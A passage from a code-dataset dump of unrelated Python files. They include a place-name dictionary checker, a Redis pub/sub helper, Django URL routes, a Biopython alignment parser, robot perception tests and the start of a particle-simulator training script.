True\r\n\t\tfor child in 
self.get_children():\r\n\t\t\tif not child.check_recursively():\r\n\t\t\t\tresult = False\r\n\t\treturn result\r\n\t\r\n\tdef has_child(self):\r\n\t\treturn True\r\n\t\r\n\tdef is_root(self):\r\n\t\treturn True\r\n\t\r\n\tdef fetch_kiwi_record(self):\r\n\t\treturn None\r\n\t\r\n\tdef fetch_kiwi_frame(self):\r\n\t\tif self._kiwiFrame != None:\r\n\t\t\treturn self._kiwiFrame\r\n\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame()\r\n\t\treturn self._kiwiFrame\r\n\t\r\n\tdef get_type(self):\r\n\t\treturn 'China'\r\n\r\n\r\nclass DicItemChecker:\r\n\t\"\"\"Class to check dictionary item. \r\n\t\"\"\"\r\n\t# alphabets that might be found in text.\r\n\talphabets = set(u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')\r\n\t# pinyin should only contains these characters\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, dicItem):\r\n\t\t\"\"\" Constructor.\r\n\t\t\"\"\"\r\n\t\tself._dicItem = dicItem\r\n\t\tself._children_offset_indexed = None\r\n\t\tself._checked_another_name = False\r\n\t\tself._checked = False\r\n\r\n\tdef check(self, forceCheck = False):\r\n\t\t\"\"\"Check dictionary item.\r\n\t\t\"\"\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\tif not forceCheck:\r\n\t\t\ttry:\r\n\t\t\t\tself._dicItem.fetch_kiwi_record()\r\n\t\t\texcept KeyError:\r\n\t\t\t\t#log.warning(r' : You should check it manually : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\t\treturn self._check_another_name()\r\n\t\t# check all the items\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\tr3 = self._check_3()\r\n\t\tr4 = self._check_4()\r\n\t\tr5 = self._check_5()\r\n\t\tr6 = self._check_6()\r\n\t\tr7 = self._check_7()\r\n\t\tr8 = self._check_8()\r\n\t\tr9 = self._check_9()\r\n\t\treturn r1 and r2 and r3 and r4 and r5 and r6 and r7 and r8 and r9\t\r\n\t\r\n\tdef _check_another_name(self):\r\n\t\t\"\"\"Check another name of the dictionary item.\r\n\t\t\"\"\"\r\n\t\tself._checked_another_name = True\r\n\t\tfor item in self._dicItem.get_father().get_children():\r\n\t\t\tif item['offset'] == self._dicItem['offset']:\r\n\t\t\t\ttry:\r\n\t\t\t\t\titem.fetch_kiwi_record()\r\n\t\t\t\texcept KeyError:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif not self.is_another_name(item, self._dicItem):\r\n\t\t\t\t\tlog.warning(r' : not another name : %s', self._dicItem.get_str())\r\n\t\t\t\t\treturn False\r\n\t\t\t\tlog.info(r' : %s : %s : %s', \r\n\t\t\t\t\t\tself._dicItem.get_father()['nextLevelId'], \r\n\t\t\t\t\t\tself._dicItem.get_str(),\r\n\t\t\t\t\t\titem.get_str())\r\n\t\t\t\treturn DicItemChecker(item).check(True)\r\n\t\tlog.warning(r' : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\t\r\n\tdef is_another_name(self, r1, r2):\r\n\t\t\"\"\"Check if r1 is another of r2.\r\n\t\t\"\"\"\r\n\t\tif r1['nextLevelId'] != r2['nextLevelId'] \\\r\n\t\t\t\tor r1['nextLevelInfo'] != r2['nextLevelInfo'] \\\r\n\t\t\t\tor r1['offset'] != r2['offset'] \\\r\n\t\t\t\tor r1['voiceId'] != r2['voiceId'] \\\r\n\t\t\t\tor r1['nextLevelNum'] != r2['nextLevelNum']:\r\n\t\t\treturn False\r\n\t\telif r1['name'].find(r2['name']) >= 0 or r2['name'].find(r1['name']) >= 0:\r\n\t\t\treturn True\r\n\t\telif r1['name'].find(u'全域') >= 0 and r2['name'].find(u'全域') >= 0:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\r\n\tdef checked_another_name(self):\r\n\t\t\"\"\"Judge if another name has been checked\r\n\t\t\"\"\"\r\n\t\treturn 
self._checked_another_name;\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check the name.\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef _check_3(self):\r\n\t\t\"\"\"Check next level id.\r\n\t\t\"\"\"\r\n\t\tr1 = self._check_3_1()\r\n\t\tr2 = self._check_3_2()\r\n\t\treturn r1 and r2\r\n\r\n\tdef _check_4(self):\r\n\t\t\"\"\"Check next level info.\r\n\t\t\"\"\"\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\tif self._dicItem['nextLevelInfo'] != '0x00000001':\r\n\t\t\t\tlog.info(r' next level info : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\t\treturn False\r\n\t\t\treturn True\r\n\t\t\r\n\t\tret = True\r\n\t\tgetb = lambda x,n: bool(x>>n & 1)\r\n\t\tnextLevelInfo = int(self._dicItem['nextLevelInfo'], 16)\r\n\t\tbits = tuple(getb(nextLevelInfo, n) for n in range(32))\r\n\t\tfor n in range(7,32):\r\n\t\t\tif bits[n] != False:\r\n\t\t\t\tlog.info(' next level info : %s', self._dicItem.get_str())\r\n\t\t# check bit0\r\n\t\tfor item in self._dicItem.get_children():\r\n\t\t\ttype = item.get_type()\r\n\t\t\tif type == 'Sheng' or type == 'ZhiXiaShi':\r\n\t\t\t\tif bits[1] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' : Sheng/ZhiXiaShi : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Di':\r\n\t\t\t\tif bits[2] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' next level info : Di : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Xian' or type == 'Qu':\r\n\t\t\t\tif bits[3] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' next level info : Xian : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Lu':\r\n\t\t\t\tif bits[4] != True:\r\n\t\t\t\t\tlog.warning(r' next level info : Lu : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'QuanYu':\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\traise KeyError()\r\n\t\tif self._dicItem.get_type() == 'QuanYu':\r\n\t\t\tif bits[6] != True:\r\n\t\t\t\tlog.warning(r' next level info : QuanYu Road Check Error : %s', self._dicItem.get_str())\r\n\t\t\t\tret = False\r\n\t\telse:\r\n\t\t\tif bits[6] == True:\r\n\t\t\t\tlog.warning(r' next level info : QuanYu Road Check Error : %s', self._dicItem.get_str())\r\n\t\t\t\tret = False\r\n\t\treturn ret\r\n\r\n\tdef _check_5(self):\r\n\t\t\"\"\"Check offset equals to kiwi data.\r\n\t\t\"\"\"\r\n\t\tif int(self._dicItem['offset'], 16) == \\\r\n\t\t\t\tself._dicItem.fetch_kiwi_record()['offset']:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.warning(r' offset : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\r\n\tdef _check_6(self):\r\n\t\t\"\"\"Check voice id.\r\n\t\t\"\"\"\r\n\t\tvoiceId = int(self._dicItem['voiceId'], 16)\r\n\t\tif voiceId == 0xffffffff:\r\n\t\t\tvoiceId = 0\r\n\t\tkVoiceId = self._dicItem.fetch_kiwi_record()['voiceId']\r\n\t\tif voiceId == kVoiceId:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.warning(r' voice id : %s', self._dicItem.get_str())\r\n\t\t\treturn 
False\r\n\t\treturn True\r\n\r\n\tdef _check_7(self):\r\n\t\t\"\"\"Check the number of next level places.\r\n\t\t\"\"\"\r\n\t\tnum = int(self._dicItem['nextLevelNum'], 16)\r\n\t\trealNum = num\r\n\t\tret = True\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\t# if num != 0 !!\r\n\t\t\tif num != len(self._dicItem.get_children()):\r\n\t\t\t\tret = False\r\n\t\telse:\r\n\t\t\trealNum = len(set(r['offset'] for r in self._dicItem.get_children()))\r\n\t\t\tif num == 0 or realNum == 0 or realNum > num:\r\n\t\t\t\tret = False\r\n\t\ttry:\r\n\t\t\tknum = len(self._dicItem.fetch_kiwi_frame())\r\n\t\texcept KeyError:\r\n\t\t\tknum = 0;\r\n\t\tif realNum != knum:\r\n\t\t\tret = False\r\n\t\tif not ret:\r\n\t\t\tlog.warning(r' next level number : %s', self._dicItem.get_str())\r\n\t\treturn ret\r\n\r\n\tdef _check_8(self):\r\n\t\t\"\"\"Check replacename, which is already checked.\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\r\n\tdef _check_9(self):\r\n\t\t\"\"\"Check others.\r\n\t\t\"\"\"\r\n\t\tr1 = self._check_9_1()\r\n\t\tr2 = self._check_9_2()\r\n\t\tr3 = self._check_9_3()\r\n\t\tr4 = self._check_9_4()\r\n\t\treturn r1 and r2 and r3 and r4\r\n\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\"\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_3_1(self):\r\n\t\t\"\"\"Check next level id and if next level file exists\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\ttry:\r\n\t\t\tk = d.fetch_kiwi_record()\r\n\t\texcept:\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\tnextLevelId = d['nextLevelId']\r\n\t\tif not k.has_next_level():\r\n\t\t\tif nextLevelId != '0xFFFFFFFF':\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\t\t# do not return now, go on checking\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tif nextLevelId == '0xFFFFFFFF':\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\r\n\t\t# check file exists\r\n\t\tfilename = nextLevelId[2:]+'.txt'\r\n\t\tfilepath = os.path.join(d._folder, filename)\r\n\t\tif not os.path.isfile(filepath):\r\n\t\t\t# file not exist\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef _check_3_2(self):\r\n\t\t\"\"\"Check if [next level id] corresponds with higher-level\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\t# road, checked in check_3_1\r\n\t\tif not d.has_child():\r\n\t\t\treturn True\r\n\t\t# province\r\n\t\ttype = d.get_type()\r\n\t\tfId = d.get_father()['nextLevelId']\r\n\t\tId = d['nextLevelId']\r\n\t\t\r\n\t\tifId = int(fId, 16)\r\n\t\tiId = int(Id, 16)\r\n\t\tif fId != '0x80000001':\r\n\t\t\tif ifId & iId != ifId or ifId | iId != iId or ifId == iId:\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\r\n\t\tif type == 'Sheng' or type == 'ZhiXiaShi':\r\n\t\t\tif re.match(r'0x8[\\dA-F]{2}00000', Id) and Id != '0x80000000':\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Sheng/ZhiXiaShi : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'Di':\r\n\t\t\tif re.match(fId[:5] + 
r'[\\dA-F]{2}000', Id) and Id != fId:\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Di : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'Xian' or type == 'Qu':\r\n\t\t\tif re.match(fId[:7] + r'[\\dA-F]{3}', Id) and Id != fId:\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Xian/Qu : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'QuanYu':\r\n\t\t\tif Id[-3:] != '001' or Id == fId:\r\n\t\t\t\tlog.warning(r' : QuanYu : %s', d.get_str())\r\n\t\t\treturn True\r\n\t\r\n\tdef _check_9_1(self):\r\n\t\t\"\"\"Check if all fields exists in each item.\r\n\t\tAlready checked in DicItem#get_children\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_9_2(self):\r\n\t\t\"\"\"Check dictionary format.\r\n\t\tAlready checked in DicItem#get_children\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_9_3(self):\r\n\t\t\"\"\"Check if there are repeated next level info or voice id.\r\n\t\tReplace names are checked specially.\r\n\t\t@retval True: no repeated next level id or voice id.\r\n\t\t@retval False: has repeated next level id or voice id.\r\n\t\t\"\"\"\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\treturn True\r\n\t\tRs = self._dicItem.get_children()\r\n\t\tret = True\r\n\t\tfor r in Rs:\r\n\t\t\tid = r['nextLevelId']\r\n\t\t\tif id == '0xFFFFFFFF':\r\n\t\t\t\tcontinue\r\n\t\t\tsameIdRs = filter(lambda rt:rt['nextLevelId']==id, Rs)\r\n\t\t\tif len(sameIdRs) != 1:\r\n\t\t\t\tfor r in sameIdRs[1:]:\r\n\t\t\t\t\tif not self.is_another_name(r, sameIdRs[0]):\r\n\t\t\t\t\t\tlog.warning(r' : %s : %s : %d', self._dicItem.get_str(), id, len(sameIdRs))\r\n\t\t\t\t\t\tret = False\r\n\t\tfor r in Rs:\r\n\t\t\tvid = r['voiceId']\r\n\t\t\tif vid == '0xFFFFFFFF':\r\n\t\t\t\tcontinue\r\n\t\t\tsameVidRs = filter(lambda rt:rt['voiceId']==vid, Rs)\r\n\t\t\tif len(sameVidRs) != 1:\r\n\t\t\t\tfor r in sameVidRs[1:]:\r\n\t\t\t\t\tif not self.is_another_name(r, sameIdRs[0]):\r\n\t\t\t\t\t\tlog.warning(r' : %s : %s : %d', self._dicItem.get_str(), id, len(sameVidRs))\r\n\t\t\t\t\t\tret = False\r\n\t\treturn ret\r\n\t\r\n\tdef _check_9_4(self):\r\n\t\t\"\"\"Check if all records in Kiwi exists in dictionary\r\n\t\t\"\"\"\r\n\t\tret = True\r\n\t\td = self._dicItem\r\n\t\tk = d.fetch_kiwi_record()\r\n\t\tnextLevelOffsets = tuple(int(c['offset'], 16) for c in self._dicItem.get_children()) \r\n\t\tif not k.has_next_level():\r\n\t\t\tif not d.has_child():\r\n\t\t\t\treturn True\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\tfor k in d.fetch_kiwi_frame():\r\n\t\t\tif not k['offset'] in nextLevelOffsets:\r\n\t\t\t\tlog.warning(r' : %s : %x', self._dicItem.get_str(), k['offset'])\r\n\t\t\t\tret = False\r\n\t\treturn ret\r\n\r\n","sub_path":"pycode/VrDicCheck.py","file_name":"VrDicCheck.py","file_ext":"py","file_size_in_byte":20878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"576848327","text":"# -*- coding: utf-8 -*-\nimport redis\n\n\nclass RedisHelper:\n\n def __init__(self, host='127.0.0.1', port=6379):\n self.__conn = redis.Redis(host=host, port=port)\n self.chan_sub = 'message_pub' # 订阅-接受\n self.chan_pub = 'message_pub' # 发布\n self.messageList = 'MessageList' # 信息集\n\n def public(self, msg):\n \"\"\"\n 发布信息\n :param msg:\n :return:\n \"\"\"\n self.__conn.publish(self.chan_pub, msg)\n return True\n\n def subscribe(self):\n \"\"\"\n 接受信息\n :return:\n \"\"\"\n pub = self.__conn.pubsub()\n pub.subscribe(self.chan_sub)\n pub.parse_response()\n return pub\n\n def pop(self):\n 
\"\"\"\n 消息出栈\n :return:\n \"\"\"\n m = self.__conn.blpop(self.messageList)\n return m\n\n def push(self, msg):\n try:\n self.__conn.lpush(self.messageList, msg)\n return True\n except Exception as e:\n return str(e)\n\n\nif __name__ == '__main__':\n r = RedisHelper('127.0.0.1')\n","sub_path":"RedisServer/RedisHelper.py","file_name":"RedisHelper.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424699074","text":"\"\"\"CataractProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf.urls import url\nfrom InformTable import views\n\nurlpatterns = [\n url(r'admin/', admin.site.urls),\n url(r'^postdiagnose/', views.postdiagnose),\n url(r'^patientslist/', views.showpatientlist),\n url(r'^editdiagnose/(?P[0-9]*)/edit$', views.editdiagnose, name=\"edit\"),\n url(r'^doctorlogin/', views.doctorlogin),\n url(r'^diagnose/(?P[0-9]*)/delete$', views.deletediagnose, name=\"delete\"),\n url(r'^doctorsignup/', views.doctorsignup),\n url(r'^doctorlogout/', views.doctorlogout)\n]\n","sub_path":"CataractProject/CataractProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637011477","text":"\"\"\"Data Mining - ENEM 2015.\"\"\"\n\nimport pandas as pd\nimport settings as st\n\nenem_2015_df = pd.read_csv(st.enem_2015_csv,\n encoding='latin-1',\n nrows=100)\n\noutput = enem_2015_df.groupby('NO_MUNICIPIO_RESIDENCIA').size()\n\ngraph = output.plot.bar(figsize=(15, 15))\ngraph.get_figure().savefig('teste.png')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297059373","text":"#!/usr/bin/env python\n\nimport os, sys, string, re, cPickle\nfrom Bio.SeqUtils import CheckSum\nfrom Bio import SeqIO\n\nuppercase_translation = string.maketrans(string.lowercase, string.uppercase)\ntrivial_translation = string.maketrans('', '')\nspecial_tree_char_translation = string.maketrans('(),[]', '_____')\ndotdash = '.-'\n\nid_re = re.compile('[^(:),]*')\nbranch_length_re = re.compile('[0-9]\\.[0-9e\\-]*')\n\nclass node:\n def __init__(self, seguid=None):\n self.children = set()\n self.leftId = None\n self.rightId = None\n if seguid:\n self.contained_seguids = set([seguid])\n else:\n self.contained_seguids = set()\n\n def addChild(self, child):\n self.children.add(child)\n self.contained_seguids = self.contained_seguids | child.contained_seguids\n\n def updateLeftId(self, leftId):\n self.leftId = leftId\n rightId = leftId + 1\n for child in self.children:\n rightId = child.updateLeftId(rightId)\n self.rightId = rightId\n return rightId + 1\n\n def readFromTreeString(self, tree_string, seguids, i):\n if i >= len(tree_string):\n return len(tree_string)\n if 
tree_string[i] == '(':\n while tree_string[i] != ')':\n child = node()\n i = child.readFromTreeString(tree_string, seguids, i+1)\n self.addChild(child)\n i += 1\n else:\n id = id_re.match(tree_string[i:]).group(0)\n i += len(id)\n self.seguid = seguids[id]\n self.contained_seguids = set([self.seguid])\n if i < len(tree_string) and tree_string[i] == ':':\n i += 1\n branch_length = branch_length_re.match(tree_string[i:]).group(0)\n i += len(branch_length)\n return i\n\n def updateAlignmentOffsetOfLeftId(self, alignment_offset_dict,\n alignment_offset_of_left_id):\n if len(self.contained_seguids) > 0:\n for seguid in self.contained_seguids:\n if seguid in alignment_offset_dict:\n if len(self.contained_seguids) in alignment_offset_dict[seguid]:\n alignment_offset_of_left_id[self.leftId] \\\n = alignment_offset_dict[seguid][len(self.contained_seguids)]\n break\n for child in self.children:\n child.updateAlignmentOffsetOfLeftId(alignment_offset_dict,\n alignment_offset_of_left_id)\n\ndef get_seguids_of_ids(work_path):\n seguids = {}\n ids_of_seguid = {}\n f = open(os.path.join(work_path, \"input_unaligned.fasta\"))\n for record in SeqIO.parse(f, \"fasta\"):\n id = record.id.replace(':', '_')\n additional_id = id.translate(special_tree_char_translation, '')\n seguid = CheckSum.seguid(record.seq)\n seguids[id] = seguid\n seguids[additional_id] = seguid\n # Don't put the additional_id in ids_of_seguid, as views.py expects there\n # to be one id per leaf.\n if seguid not in ids_of_seguid:\n ids_of_seguid[seguid] = set()\n ids_of_seguid[seguid].add(id)\n f.close()\n for seguid in ids_of_seguid:\n id_list = list(ids_of_seguid[seguid])\n id_list.sort()\n ids_of_seguid[seguid] = id_list\n f = open(os.path.join(work_path, \"ids_of_seguid.pkl\"), \"w\")\n cPickle.dump(ids_of_seguid, f)\n f.close()\n return (seguids, ids_of_seguid)\n\ndef parse_tree(work_path):\n seguids, ids_of_seguid = get_seguids_of_ids(work_path)\n f = open(os.path.join(work_path, \"satchmo_tree.newick\"))\n tree_string = f.read()\n f.close()\n tree_string = tree_string.translate(trivial_translation, string.whitespace)\n root = node()\n root.readFromTreeString(tree_string, seguids, 0)\n root.updateLeftId(1)\n return root\n\ndef parse_smo(work_path):\n f = open(os.path.join(work_path, \"satchmo.smo\"))\n alignment_offset_dict = {}\n records = set()\n current_header = \"\"\n current_sequence = \"\"\n alignmentOffset = 0\n alignmentNumBytes = 0\n withinAlignment = False\n start_of_line = f.tell()\n line = f.readline()\n while line:\n if line.rstrip() == 'alignment':\n # skip past the line with the curly brace\n f.readline()\n # the next line is the start of the alignment\n alignmentOffset = f.tell()\n withinAlignment = True\n elif line.rstrip() == '//':\n if current_sequence != '':\n seguid = CheckSum.seguid(current_sequence)\n records.add( seguid )\n alignmentNumBytes = start_of_line - alignmentOffset\n for seguid in records:\n if seguid not in alignment_offset_dict:\n alignment_offset_dict[seguid] = {}\n alignment_offset_dict[seguid][len(records)] \\\n = (alignmentOffset, alignmentNumBytes)\n records = set()\n current_header = \"\"\n current_sequence = \"\"\n withinAlignment = False\n elif withinAlignment:\n if len(line) > 0 and line[0] == '>':\n if current_sequence != '':\n seguid = CheckSum.seguid(current_sequence)\n records.add( seguid )\n current_header = line[1:].rstrip()\n current_sequence = \"\"\n else:\n current_sequence = current_sequence + \\\n line.strip().translate(uppercase_translation, dotdash)\n start_of_line = f.tell()\n 
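# remember the offset of the upcoming line: when a '//' terminator is read, alignmentNumBytes = start_of_line - alignmentOffset sizes the alignment block\r\n 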
line = f.readline()\n f.close()\n return alignment_offset_dict\n\ndef find_alignment_offset_of_left_id(work_path):\n alignment_offset_dict = parse_smo(work_path)\n root = parse_tree(work_path)\n alignment_offset_of_left_id = {}\n root.updateAlignmentOffsetOfLeftId(alignment_offset_dict,\n alignment_offset_of_left_id)\n return alignment_offset_of_left_id\n\n\ndef main():\n if len(sys.argv) < 2:\n path = os.getcwd()\n else:\n path = sys.argv[1]\n\n alignment_offset_of_left_id = find_alignment_offset_of_left_id(path)\n f = open(os.path.join(path, 'alignment_offset_of_left_id.pkl'), \"w\")\n cPickle.dump(alignment_offset_of_left_id, f)\n f.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pfacts003/satchmo/parse_smo.py","file_name":"parse_smo.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"476805520","text":"import unittest\n\n# datatypes\nimport PyKDL as kdl\nfrom robot_skills.util.kdl_conversions import VectorStamped\n\n# Robot Skills\nfrom robot_skills.mockbot import Mockbot\nfrom robot_skills.util.entity import Entity\nfrom robot_skills.util.volume import BoxVolume\n\n# Robot Smach States\nfrom robot_smach_states.perception import LookAtArea, LookAtEntity\nimport robot_smach_states.util.designators as ds\n\n\nclass TestLookAtEntity(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.robot = Mockbot()\n\n def setUp(self):\n self.entity = Entity(\"12345\", \"dummy\", \"map\",\n kdl.Frame(kdl.Rotation.RPY(1, 0, 0),\n kdl.Vector(3, 3, 3)),\n None, {}, None, 0)\n\n def test_look_at_enity_looks_at_correct_point(self):\n \"\"\"Test that the robot looks at the center point of the named area, w.r.t. the frame of the entity\"\"\"\n entity_ds = ds.Designator(self.entity)\n\n state = LookAtEntity(self.robot, entity_ds, waittime=0)\n\n state.execute()\n\n vs = VectorStamped(0, 0, 0, \"12345\")\n\n self.robot.head.look_at_point.assert_called_with(vs)\n\n\nclass TestLookAtArea(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.robot = Mockbot()\n\n def setUp(self):\n box = BoxVolume(kdl.Vector(0, 0, 0),\n kdl.Vector(1, 1, 1))\n\n self.entity = Entity(\"12345\", \"dummy\", \"map\",\n kdl.Frame(kdl.Rotation.RPY(1, 0, 0),\n kdl.Vector(3, 3, 3)),\n None, {\"dummy_volume\": box}, None, 0)\n\n self.area = \"dummy_volume\"\n\n def test_look_at_area_looks_at_correct_point(self):\n \"\"\"Test that the robot looks at the center point of the named area, w.r.t. 
the frame of the entity\"\"\"\n entity_ds = ds.Designator(self.entity)\n area_ds = ds.Designator(self.area)\n\n state = LookAtArea(self.robot, entity_ds, area_ds, waittime=0)\n\n state.execute()\n\n vs = VectorStamped(0.5, 0.5, 0.5, \"12345\")\n\n self.robot.head.look_at_point.assert_called_with(vs, timeout=0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"robot_smach_states/test/test_perception.py","file_name":"test_perception.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"201883899","text":"import collections\nimport json\nimport os\nimport pickle\nimport glob\nimport re\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom absl import flags\nfrom absl import app\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom gns import learned_simulator\nfrom gns import noise_utils\nfrom gns import reading_utils\nfrom gns import data_loader\nfrom gns import distribute\n\nflags.DEFINE_enum(\n 'mode', 'train', ['train', 'valid', 'rollout'],\n help='Train model, validation or rollout evaluation.')\nflags.DEFINE_integer('batch_size', 2, help='The batch size.')\nflags.DEFINE_float('noise_std', 6.7e-4, help='The std deviation of the noise.')\nflags.DEFINE_string('data_path', None, help='The dataset directory.')\nflags.DEFINE_string('model_path', 'models/', help=('The path for saving checkpoints of the model.'))\nflags.DEFINE_string('output_path', 'rollouts/', help='The path for saving outputs (e.g. rollouts).')\nflags.DEFINE_string('model_file', None, help=('Model filename (.pt) to resume from. Can also use \"latest\" to default to newest file.'))\nflags.DEFINE_string('train_state_file', 'train_state.pt', help=('Train state filename (.pt) to resume from. 
Can also use \"latest\" to default to newest file.'))\n\nflags.DEFINE_integer('ntraining_steps', int(2E7), help='Number of training steps.')\nflags.DEFINE_integer('nsave_steps', int(5000), help='Number of steps at which to save the model.')\n\n# Learning rate parameters\nflags.DEFINE_float('lr_init', 1e-4, help='Initial learning rate.')\nflags.DEFINE_float('lr_decay', 0.1, help='Learning rate decay.')\nflags.DEFINE_integer('lr_decay_steps', int(5e6), help='Learning rate decay steps.')\n\nflags.DEFINE_integer(\"cuda_device_number\", None, help=\"CUDA device (zero indexed), default is None so default CUDA device will be used.\")\n\nStats = collections.namedtuple('Stats', ['mean', 'std'])\n\nINPUT_SEQUENCE_LENGTH = 6 # So we can calculate the last 5 velocities.\nNUM_PARTICLE_TYPES = 9\nKINEMATIC_PARTICLE_ID = 3\n\ndef rollout(\n simulator: learned_simulator.LearnedSimulator,\n position: torch.tensor,\n particle_types: torch.tensor,\n n_particles_per_example: torch.tensor,\n nsteps: int,\n device):\n \"\"\"Rolls out a trajectory by applying the model in sequence.\n\n Args:\n simulator: Learned simulator.\n features: Torch tensor features.\n nsteps: Number of steps.\n \"\"\"\n initial_positions = position[:, :INPUT_SEQUENCE_LENGTH]\n ground_truth_positions = position[:, INPUT_SEQUENCE_LENGTH:]\n\n current_positions = initial_positions\n predictions = []\n\n for step in range(nsteps):\n # Get next position with shape (nnodes, dim)\n next_position = simulator.predict_positions(\n current_positions,\n nparticles_per_example=[n_particles_per_example],\n particle_types=particle_types,\n )\n\n # Update 